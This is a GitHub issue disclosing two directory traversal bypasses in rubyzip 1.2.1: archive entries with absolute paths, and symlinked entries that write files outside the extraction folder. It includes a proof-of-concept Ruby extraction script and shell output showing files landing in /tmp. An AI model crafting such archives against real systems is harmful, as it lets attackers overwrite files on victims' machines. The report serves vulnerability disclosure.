8000 Several directory traversal vulnerabilities · Issue #369 · rubyzip/rubyzip · GitHub
[go: up one dir, main page]
Skip to content
Several directory traversal vulnerabilities #369
New issue
New issue
Closed
#371
Closed
Several directory traversal vulnerabilities#369
#371
@tuzovakaoff

Description

@tuzovakaoff
tuzovakaoff
opened on Jun 14, 2018

Overview

This issue is similar to already closed #315 but I found two ways to bypass that fix.

You can find files for tests in https://github.com/tuzovakaoff/zip_path_traversal

Proof of concept:

rubyzip.rb
require 'zip'
first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

1. Files with absolute path

UnZip strips absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> unzip absolutepath.zip
Archive:  absolutepath.zip
warning:  stripped absolute path spec from /tmp/
   creating: tmp/
warning:  stripped absolute path spec from /tmp/file.txt
  inflating: tmp/file.txt

> ls
absolutepath.zip	symlink.zip
rubyzip.rb		tmp

rubyzip extracts files with absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ruby rubyzip.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ls /tmp
file.txt

2. Archive with symbolic link

UnZip extracts only symbolic link

> unzip symlink.zip
Archive:  symlink.zip
    linking: path                    -> ../../../../../tmp
checkdir error:  path exists but is not directory
                 unable to process path/file.txt.
finishing deferred symbolic links:
  path                   -> ../../../../../tmp


> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:19 path -> ../../../../../tmp

rubyzip extracts symbolic link and puts file into /tmp folder

> ruby rubyzip.rb symlink.zip 
Extracting path
Extracting path/file.txt

> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:22 path -> ../../../../../tmp

>ls /tmp
file.txt

Vulnerable version and test environment

> uname -rsv
Darwin 17.6.0 Darwin Kernel Version 17.6.0: Tue May  8 15:22:16 PDT 2018; root:xnu-4570.61.1~1/RELEASE_X86_64

> ruby -v
ruby 2.5.0p0 (2017-12-25 revision 61468) [x86_64-darwin17]

> gem list | grep zip
rubyzip (1.2.1)
> uname -rsv
Linux 2.6.32-573.18.1.el6.x86_64 #1 SMP Tue Feb 9 22:46:17 UTC 2016

> ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]

> gem list | grep zip
rubyzip (1.2.1)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions
      0